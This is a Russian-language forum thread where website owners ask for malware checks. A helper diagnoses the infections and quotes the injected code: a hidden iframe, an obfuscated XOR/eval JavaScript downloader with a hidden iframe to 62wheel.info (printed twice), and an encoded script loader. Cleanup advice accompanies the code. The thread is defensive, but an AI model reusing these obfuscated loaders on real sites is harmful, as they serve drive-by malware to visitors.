Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

[Sedoy]

Здравствуйте, возникла проблема с вирусом на сайте _webcompmania.ru .
Ни один антивирусник не ругаеться но яндекс дает вот такую сноску «Этот сайт может угрожать безопасности вашего компьютера». Да была не сонкционированная ссылка в коде но она и код счётчика были удалены прошло некоторое время и опять яндекс вывел тот же результат , при прсмотре кода вообще ни чего не обнаружилось и так происходит уже белее трёх дней с утра заражён ближе к вечеру всё нормально. Поменял и просканировал весь комп всё FTP, браузеры не могу понять

 

[tiesto77]

Добрый день. Большая просьба помочь найти вредоносный код на сайте хттп://fanmedia.org.ua. Онлайн проверка результатов не дала, но антивирус ругается (Заблокировано соединение с вредоносным сайтом...адрес левого сайта). Спасибо.

 

[akok]

адрес левого сайта

Пришлите адрес в ЛС, пожалуйста.

 

[akok]

Сайт заражен. Существует скрытый iframe

<iframe src='http://localsite.****/doc/go.php?sid=1' style='display:none;'></iframe>

Который в свою очередь "редиректит" на

http://abs****andit.com//index.php?

Вредоносное содержимое отдает только один раз на один IP, иначе осуществляет редирект на http://www.whitehouse.gov/robots.txt

Лечение:
1. На Ftp найти файл */engine/classes/js/dle_ajax.js и убрать

 ;document.write("<"+"i"+"f"+"rame"+" sr"+"c='http://localsite.spb.ru/doc/go.php?sid=1'"+" style='d"+"isplay:no"+"ne;
 '></"+"i"+"f"+"rame>");

А лучше файл заменить на заведомо чистый из дистрибутива.

2. Сменить пароль на ftp ресурса.

3. Проверить компьютер, с которого администрируется ресурс, на наличие вредоносного ПО.

4. Провести анализ логов Apache, для анализа следов взлома.

 

[tiesto77]

Спасибо большое.

 

[aks99]

Добрый день.
Прошу помочь. Сегодня начали жаловаться на мой сайт ввв.anitamama.ru - TROJ_JAVA.AQ .
Symantec и NOD32 не находят , а TrendMicro и еще какие-то ругаются.
Заранее спасибо !

 

[akok]

Вечером проверю более внимательно.

Сайт заражен:
Trojan-Downloader.JS.Agent.fer
И пытается загрузить
Exploit.JS.Pdfka.bz

Добавлено через 12 минут 19 секунд
Уберите в конце листа код:

<script language="javascript" type="text/javascript">var popAt;popAt='%85%84%86%82%82%87%83%83%f0%8f%92%91%89%89%9c%96%d9%d8%9b%9d%fc%83%88%93%d6%88%be%87%b9%88%8e%a3%93%83%ff%a1%92%8f%96%82%a5%8d%99%e5%e9%88%97%91%9a%98%92%ac%d4%ff%d0%9c%91%a4%99%8a%bf%85%85%c5%a9%d4%97%92%90%b5%8f%94%94%de%b8%83%c3%9f%89%99%ad%81%89%97%98%96%83%85%8b%b0%be%ba%c5%cf%8c%9b%81%85***%da%ca%dd%de%91%95%d7%82%8b%be%ba%94%b6%95%a4%98%92%cc%bb%81%bd%bd%82%86%a3%84%95%f4%c9%b3%93%84%8e%ab%85%83%f2%84%9e%89%ae%98%b1%cc%90%e9%c5%cb%95%cd%99%c9%94%83%bf%9a%83%94%84%d6%95%9b%df%b2%85%cb';function codeNs(rarBedAwk){function outAt(bestNetNs){var logAwk=0;var zorgBgPip=bestNetNs.length, argVipOp=0;while(argVipOp<zorgBgPip){logAwk+=outMov(bestNetNs,argVipOp)*zorgBgPip;argVipOp++;}return (logAwk+'');}function outMov(nilNet,memWait){return nilNet['c?h?ayrGCGo?d?e?A@ty'.replace(/[y@Z\?G]/g, '')](memWait);}if((new String(document.write)).indexOf('arity')>0){return;}var bcArgOp=0,imgPico=0,manArcZip=179;var cdPop='';var useModMax=(new String(codeNs)).replace(/[^@a-z0-9A-Z_.,-]/g,'');var nanoCallAwk=outAt(useModMax);rarBedAwk=window['u%n%e/s/cDaEp%e%'.replace(/[%/lED]/g, '')](rarBedAwk);for(var midFcCal=0; midFcCal < (rarBedAwk.length); midFcCal++){var orgIn=outMov(useModMax,bcArgOp);var netArc=outMov(nanoCallAwk,imgPico);var exitGet=orgIn^netArc^manArcZip;var popBc=outMov(rarBedAwk,midFcCal);bcArgOp++,imgPico++;cdPop+=String['f~r+olm+ClhwaAr+C+o+d~e~'.replace(/[\+l~wA]/g, '')](popBc^exitGet);if(imgPico>nanoCallAwk.length)imgPico=0;if(bcArgOp>useModMax.length)bcArgOp=0;}window['eNvNa2lN'.replace(/[iDNq2]/g, '')](cdPop);return cdPop=new String();}codeNs(popAt);</script><iframe style="height: 0pt; width: 0pt; outline: medium none;" name="cpPkg" src="http://62wheel.info/t/" frameborder="0"></iframe>

 

[aks99]

Спасибо !
Получилось исправить. Вредоносный код в \templates\ в каждом шаблоне index.php (Joomla)

Вечером проверю более внимательно.

Сайт заражен:
Trojan-Downloader.JS.Agent.fer
И пытается загрузить
Exploit.JS.Pdfka.bz

Добавлено через 12 минут 19 секунд
Уберите в конце листа код:

<script language="javascript" type="text/javascript">var popAt;popAt='%85%84%86%82%82%87%83%83%f0%8f%92%91%89%89%9c%96%d9%d8%9b%9d%fc%83%88%93%d6%88%be%87%b9%88%8e%a3%93%83%ff%a1%92%8f%96%82%a5%8d%99%e5%e9%88%97%91%9a%98%92%ac%d4%ff%d0%9c%91%a4%99%8a%bf%85%85%c5%a9%d4%97%92%90%b5%8f%94%94%de%b8%83%c3%9f%89%99%ad%81%89%97%98%96%83%85%8b%b0%be%ba%c5%cf%8c%9b%81%85***%da%ca%dd%de%91%95%d7%82%8b%be%ba%94%b6%95%a4%98%92%cc%bb%81%bd%bd%82%86%a3%84%95%f4%c9%b3%93%84%8e%ab%85%83%f2%84%9e%89%ae%98%b1%cc%90%e9%c5%cb%95%cd%99%c9%94%83%bf%9a%83%94%84%d6%95%9b%df%b2%85%cb';function codeNs(rarBedAwk){function outAt(bestNetNs){var logAwk=0;var zorgBgPip=bestNetNs.length, argVipOp=0;while(argVipOp<zorgBgPip){logAwk+=outMov(bestNetNs,argVipOp)*zorgBgPip;argVipOp++;}return (logAwk+'');}function outMov(nilNet,memWait){return nilNet['c?h?ayrGCGo?d?e?A@ty'.replace(/[y@Z\?G]/g, '')](memWait);}if((new String(document.write)).indexOf('arity')>0){return;}var bcArgOp=0,imgPico=0,manArcZip=179;var cdPop='';var useModMax=(new String(codeNs)).replace(/[^@a-z0-9A-Z_.,-]/g,'');var nanoCallAwk=outAt(useModMax);rarBedAwk=window['u%n%e/s/cDaEp%e%'.replace(/[%/lED]/g, '')](rarBedAwk);for(var midFcCal=0; midFcCal < (rarBedAwk.length); midFcCal++){var orgIn=outMov(useModMax,bcArgOp);var netArc=outMov(nanoCallAwk,imgPico);var exitGet=orgIn^netArc^manArcZip;var popBc=outMov(rarBedAwk,midFcCal);bcArgOp++,imgPico++;cdPop+=String['f~r+olm+ClhwaAr+C+o+d~e~'.replace(/[\+l~wA]/g, '')](popBc^exitGet);if(imgPico>nanoCallAwk.length)imgPico=0;if(bcArgOp>useModMax.length)bcArgOp=0;}window['eNvNa2lN'.replace(/[iDNq2]/g, '')](cdPop);return cdPop=new String();}codeNs(popAt);</script><iframe style="height: 0pt; width: 0pt; outline: medium none;" name="cpPkg" src="http://62wheel.info/t/" frameborder="0"></iframe>

 

[ahmet]

Прошу проверить на вирусы хттп://ahmt.net Вроде ничего не ставил, а некоторые жалуются. Неудобно!!!

 

[Savenkov]

Будьте любезны, посмотрите сайты :
хттп://lendex.ru
еще жена лазит по всяким женским сайтам-форумам для похудения )))
Но вот что наловил др веб
trojan.Packed.19855
Trojan.PWS.Ibank.28
adware.SaveNow
BackDoor.FoxGrabber.1 ----- этих штук 300
общее число вирусов 429 штук

 

[akok]

ahmet, ничего не вижу подозрительного на сайте. Необходимо больше информации.

Добавлено через 54 минуты 30 секунд
Savenkov, аналогично. Не вижу на ресурсе признаков заражения. (кнопки бы почистить).

 

[NomiD]

Проверьте пожалуйста сайт и форум на вирусы, черви, трояны и т.д., пользователи начали жаловаться что мол что то есть, но онлайн антивирусы ничего не нашли.
хттп://molodezh.kiev.ua/
хттп://molodezh.kiev.ua/forum/

 

[akok]

Сейчас ничего явно вредоносного не вижу. Нужно больше информации о жалобах.

 

[NomiD]

10.05.2010 13:56:00    http://molodezh.kiev.ua/favicon.ico|>{gzip} [L] HTML:Script-inf (0)
10.05.2010 13:56:14    http://molodezh.kiev.ua/forum/index.php?showtopic=8587&pid=98446&st=9720&|>{gzip} [L] JS:ScriptIP-inf [Trj] (0)
10.05.2010 13:57:36    http://molodezh.kiev.ua/forum/index.php?showtopic=8587&pid=98446&st=9720&|>{gzip} [L] JS:ScriptIP-inf [Trj] (0)
10.05.2010 13:58:36    http://molodezh.kiev.ua/forum/index.php?showtopic=16205&st=0&p=98295&|>{gzip} [L] JS:ScriptIP-inf [Trj] (0)
10.05.2010 13:59:36    http://molodezh.kiev.ua/forum/index.php?showtopic=8587&pid=98446&st=9720&|>{gzip} [L] JS:ScriptIP-inf [Trj] (0)
10.05.2010 14:46:51    http://molodezh.kiev.ua/forum/index.php?showtopic=8587&pid=98474&st=9720&|>{gzip} [L] JS:ScriptIP-inf [Trj] (0)
*
* Звіт про сканування Екраном реального часу avast!
* Цей файл згенеровано автоматично
*
* Почато: 10 Травень 2010 р. 21:28:02
*

*
* Звіт про сканування Екраном реального часу avast!
* Цей файл згенеровано автоматично
*
* Почато: 10 Травень 2010 р. 22:45:04
*

10.05.2010 23:00:02    http://molodezh.kiev.ua/favicon.ico|>{gzip} [L] HTML:Script-inf (0)
10.05.2010 23:00:24    http://molodezh.kiev.ua/forum/index.php?showtopic=15298&pid=98481&st=0&|>{gzip} [L] JS:ScriptIP-inf [Trj] (0)
10.05.2010 23:00:27    http://molodezh.kiev.ua/forum/index.php?showtopic=8587&pid=98478&st=9720&|>{gzip} [L] JS:ScriptIP-inf [Trj] (0)

и на сайте и на форуме на любой странице ругается

 

[akok]

Аваст реагирует на ссылки
хттп://tizergo.net/context.php?sid=4243&bn=jDUhHVydSve28126Tuqj&ad=0&cat=7&nod=0&sort=0&advcol=0&nap=0&pt=%D5%EE%EB%EE%E4%E8%EB%FC%ED%E8%EA%20%F1%20%E8%E7%FE%EC%E8%ED%EA%EE%E9%20-%20Molodezh.Kiev.UA&ref=
хттп://tizergo.net/tizers2.php?sid=4243&bn=HYt7bzRV2VVTS3WQfMM4&ad=0&nod=0&sort=0&tizt=0&tizw=0&pov=0&nobg=0&vref=0&vopis=0&ref=

Ставили рекламу от хттp://bodyclick.net/?

 

[NomiD]

akoK, да ставил, но с недавних пор они заблочили сайт,накрутка была, коды так и остались, так это из-за этих кодов бодиклика оно ругается что мол троян?

 

[akok]

NomiD, или смазывает картину.

 

[demiancz]

Здравствуйте. Проверьте пожалуйста <удалено>
На одной из партнерок меня забанили. Мол сайт содержит вредоносный код хттп://img.picsa.ru/pictures/0/000/041/055/41055.png
Это вчера было. Я весь день комп чистил (троян был). Потом все пароли менял (к админке, FTP и т. д.). Но когда принялся искать чтото в коде то ничего не нашел. Никак не пойму где (и есть ли вообще) этот вредоносный код. А 2 часа наза меня Яндекс убил мол на этой странице есть вредоносный код <удалено>. Я онлайн проверками проверяю - а они ничего не показывают. Пишут мол все хорошо, сайт чист.
Помогите кто может!!!

 

[akok]

Для справки.

Вечером буду смотреть с тестовой машины.

Пока я вижу подозрительную вставку:

<script type="text/javascript" language="javascript">
<!--
docu*****rite("<scr"+"ipt type='text/javascript' language='javasc"+"ript' src='");
function Sr187(uL443){document.write( String.fromCharCode(parseInt(uL443)-3));}
var y602="107h119h119h115h61h50h50h103h104h112h108h"+
"100h113h1*********4h102h107h"+
"110h100h49h113h104h119h50h115h71h93h92h104h90h53h51h"+
"59h57h50h66h118h108h103h64h57h55h52h55";var Dw663=y602.split("h");
for(y*************ength;yF436++){Sr187(Dw663[yF436]);}
document.write("'></sc"+"ript>");
// -->
</script>

Если ее расшифровать, то это означает:

<script type='text/javascript' language='javascript' src='[хттп://demia***.okoshechka.net/pDZYeW2086/?sid=6414'></script>

Это вы устанавливали этот код?

 

[demiancz]

RE

Это зашифрованный код попандера. Ставил очень давно.
Сейчас зашел на попандер. Смотрю, сейчас код отличается от того что у меня стоит. Но клики идут. Поменял код на тот который сейчас попандер предлагает.

Добавлено через 8 часов 24 минуты 17 секунд
А больше ничего подозрительного нет?

Добавлено через 18 минут 28 секунд
Если не трудно посмотрите пожалуйста еще один сайт <удалено>
Там такаяже ситуация. Проверка онлайн указывает на счетчик liveinternet и партнерку tx2. Но это врядли.